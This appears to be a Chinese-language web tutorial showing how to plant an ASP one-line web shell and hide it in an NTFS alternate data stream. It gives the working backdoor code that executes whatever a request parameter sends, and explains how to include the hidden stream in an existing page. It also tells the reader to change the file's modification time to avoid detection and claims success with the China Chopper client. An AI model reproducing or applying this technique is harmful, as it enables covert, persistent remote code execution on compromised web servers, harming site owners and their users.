這是利用NTFS流隱藏你的一句話小馬，這方法，文件寫入后，不容易給發(fā)現(xiàn)，隱藏性好！

如下是ASP腳本的例子！
NTFS流文件的內(nèi)容如下

<%
re= request("test")
if re <>"" then
execute re
response.end '表示結(jié)束，不再處理別的代碼
end if
%>

把內(nèi)容寫入如下位置(示例位置)
H:\Web\動易\Inc:1.jpg

看清楚，是:1.jpg不是\1.jpg
文件寫入后，H:\Web\動易\Inc目錄里是看不到文件的！

現(xiàn)在要引導(dǎo)這個一句話文件！格式:<!--#include file="目錄:1.jpg"-->

我隨便選一個文件(最好不要自己新建文件，別人容易發(fā)現(xiàn)有新文件)
H:\Web\動易\Announce.asp

添加
<!--#include file="inc:1.jpg"-->

修改后保存！
一句話木馬隱藏基本完成！當(dāng)然 H:\Web\動易\Announce.asp 你可以改個一下修改的時間，
這樣別人就不容易發(fā)現(xiàn)有問題！

還有說一下，2003的流，是可以寫入文件也可以寫入目錄的！你想把一句話馬寫在目錄里也成，文件里也成
但建議保存到目錄里，因為文件如果修改，流數(shù)據(jù)將會清空，但目錄不會！

用菜刀測試成功！

香港快速服務(wù)器

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。